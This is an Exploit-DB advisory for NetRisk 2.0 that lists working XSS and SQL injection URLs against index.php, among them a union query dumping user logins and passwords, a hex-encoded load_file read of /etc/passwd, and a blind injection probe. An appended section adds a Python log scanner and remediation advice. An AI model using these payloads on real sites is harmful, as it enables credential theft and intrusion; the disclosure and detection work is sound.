NetRisk <= 2.0 XSS/SQL Injection Remote Vulnerabilities

2008-11-02T00:00:00
ID EDB-ID:6957
Type exploitdb
Reporter StAkeR
Modified 2008-11-02T00:00:00

Description

NetRisk <= 2.0 (XSS/SQL Injection) Remote Vulnerabilities. CVE-2008-4887, CVE-2008-4888. Webapps exploit for the PHP platform.

# -----------------------------------------------------------------
# NetRisk <= 2.0 (XSS/SQL Injection) Remote Vulnerabilities
# -----------------------------------------------------------------
# Discovered By StAkeR aka athos
# Download On http://downloads.sourceforge.net/netrisk
# Works Regardless Of php.ini Settings!
# -----------------------------------------------------------------

# Cross Site Scripting
# index.php?error=<script>[javascript]</script>

# Remote SQL Injection 
# index.php?p=profile&id=1+union+all+select+0,0,concat(login,0x3a,password),0,0,0,0,0,0,0,0,0,0,0,0+from+netrisk_users+where+id=1/*
# index.php?p=profile&id=1+union+all+select+0,0,load_file(0x2F6574632F706173737764),0,0,0,0,0,0,0,0,0,0,0,0/*

# Remote Blind SQL Injection
# index.php?p=game&id=1 and ascii(substring((select password from netrisk_users where id=1),1,1))=[ascii]/*

# milw0rm.com [2008-11-02]
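
For defenders reviewing web server logs for requests of the shapes listed above, the following is an added example and is not part of the original advisory or of NetRisk. It assumes Common Log Format, that legitimate `id` values are plain integers, and that legitimate `error` messages contain no markup; the log lines are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (not from the advisory). The parameters mirror
# the index.php ones the advisory names: id (profile/game pages) and error.
SAMPLE_LOG = [
    '203.0.113.5 - - [02/Nov/2008:10:00:01 +0000] "GET /index.php?p=profile&id=7 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [02/Nov/2008:10:00:07 +0000] "GET /index.php?p=profile&id=1+union+all+select+0,0,0/* HTTP/1.1" 200 4981',
    '203.0.113.9 - - [02/Nov/2008:10:00:09 +0000] "GET /index.php?p=game&id=1%20and%20ascii(substring((select%201),1,1))=97/* HTTP/1.1" 200 4630',
    '198.51.100.4 - - [02/Nov/2008:10:01:30 +0000] "GET /index.php?error=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 2210',
    '198.51.100.8 - - [02/Nov/2008:10:02:00 +0000] "GET /index.php?error=Invalid+login HTTP/1.1" 200 2190',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
NUMERIC_ID = re.compile(r"[0-9]+")      # assumption: real ids are plain integers
MARKUP_CHARS = re.compile(r"[<>\"']")   # assumption: real error text has no markup


def classify(line):
    """Return the findings for one access-log line (empty list if clean)."""
    match = REQUEST_RE.search(line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    if not url.path.endswith("/index.php"):
        return []
    # parse_qs URL-decodes values, so %3C and '+' are normalised before checks.
    params = parse_qs(url.query, keep_blank_values=True)
    findings = []
    for value in params.get("id", []):
        if not NUMERIC_ID.fullmatch(value):
            findings.append("non-numeric id")
    for value in params.get("error", []):
        if MARKUP_CHARS.search(value):
            findings.append("markup in error")
    return findings


def scan(lines):
    """Return (client_ip, finding) pairs for every flagged request."""
    return [(line.split()[0], f) for line in lines for f in classify(line)]


if __name__ == "__main__":
    for ip, finding in scan(SAMPLE_LOG):
        print(ip, finding)
```

The same allowlist (integer-only `id`, markup-free `error`) is what the application should enforce server-side, together with parameterized queries and output encoding.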